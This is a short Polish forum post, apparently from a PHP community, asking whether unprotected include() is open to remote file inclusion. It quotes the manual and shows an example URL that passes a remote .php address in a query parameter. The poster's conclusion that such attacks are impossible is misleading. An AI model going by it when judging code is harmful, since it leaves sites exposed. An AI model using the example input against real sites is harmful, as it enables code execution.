![]() |
![]() |
![]()
Post
#1
|
|
![]() Grupa: Zarejestrowani Postów: 181 Pomógł: 0 Dołączył: 12.11.2005 Ostrzeżenie: (0%) ![]() ![]() |
Hi.
W manualu php jest napisane o include: "(..)Ściśle mówiąc, nie jest to to samo, co wczytywanie pliku lokalnego; jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego. W tym przypadku, rzecz jasna, zasięg globalny zmiennych nie obejmuje pliku wczytywanego tą metodą." Czyli defakto nie jest możliwy atak na niezabezpieczony include podająć adres URL do pliku .php na innym serverze ![]() http://xxxxx.pl/?tytul=http://123.123.123.123/index.php Pozdro. -------------------- Robie to co lubie, lubie to co Robie
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 21.08.2025 - 11:34 |